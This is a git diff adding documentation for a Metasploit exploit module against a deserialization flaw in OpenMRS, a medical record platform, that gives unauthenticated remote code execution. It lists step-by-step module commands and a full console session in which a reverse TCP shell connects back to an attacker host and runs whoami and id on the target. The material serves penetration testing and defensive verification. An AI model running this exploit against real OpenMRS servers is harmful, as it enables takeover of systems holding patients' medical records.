diff --git a/documentation/modules/exploit/multi/http/openmrs_deserialization.md b/documentation/modules/exploit/multi/http/openmrs_deserialization.md new file mode 100644 index 0000000000..0af4e532f3 --- /dev/null +++ b/documentation/modules/exploit/multi/http/openmrs_deserialization.md @@ -0,0 +1,69 @@ +## Vulnerable Application + + OpenMRS is an open-source platform that supplies + users with a customizable medical record system. + + There exists an object deserialization vulnerability + in the `webservices.rest` module used in OpenMRS Platform + for versions below `v2.24.0`. Unauthenticated remote code + execution can be achieved by sending a malicious XML payload + to a Rest API endpoint such as `/ws/rest/v1/concept`. + + Vulnerable versions of the software can be found [here](https://sourceforge.net/projects/openmrs/files/releases/). + + Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java + 8 and Java 9. + +## Verification Steps + + 1. Install the application + 2. Start msfconsole + 3. Do: ```use exploit/multi/http/openmrs_deserialization``` + 4. Do: ```set TARGETURI ``` + 5. Do: ```set RHOSTS ``` + 6. Do: ```run``` + 7. You should get a shell. + +## Options + + **ForceExploit** + + Overrides the check result and runs the exploit. + +## Scenarios + +### Version of software and OS as applicable + + ``` + msf5 > use exploit/multi/http/openmrs_deserialization + msf5 exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.168 + rhosts => 192.168.37.168 + msf5 exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone + targeturi => /openmrs-standalone + msf5 exploit(multi/http/openmrs_deserialization) > set lhost 192.168.37.1 + lhost => 192.168.37.1 + msf5 exploit(multi/http/openmrs_deserialization) > check + [*] 192.168.37.168:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2 + msf5 exploit(multi/http/openmrs_deserialization) > run + + [*] Started reverse TCP double handler on 192.168.37.1:4444 + [*] Target is running OpenMRS + [*] Formatting payload + [*] Sending payload... + [*] Accepted the first client connection... + [*] Accepted the second client connection... + [*] Command: echo wKYK4x9ZOHJ37tm7; + [*] Writing to socket A + [*] Writing to socket B + [*] Reading from sockets... + [*] Reading from socket B + [*] B: "wKYK4x9ZOHJ37tm7\r\n" + [*] Matching... + [*] A is input... + [*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.168:45048) at 2019-11-21 14:13:09 -0600 + + whoami + space + id + uid=1000(space) gid=1000(space) groups=1000(space),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare) + ```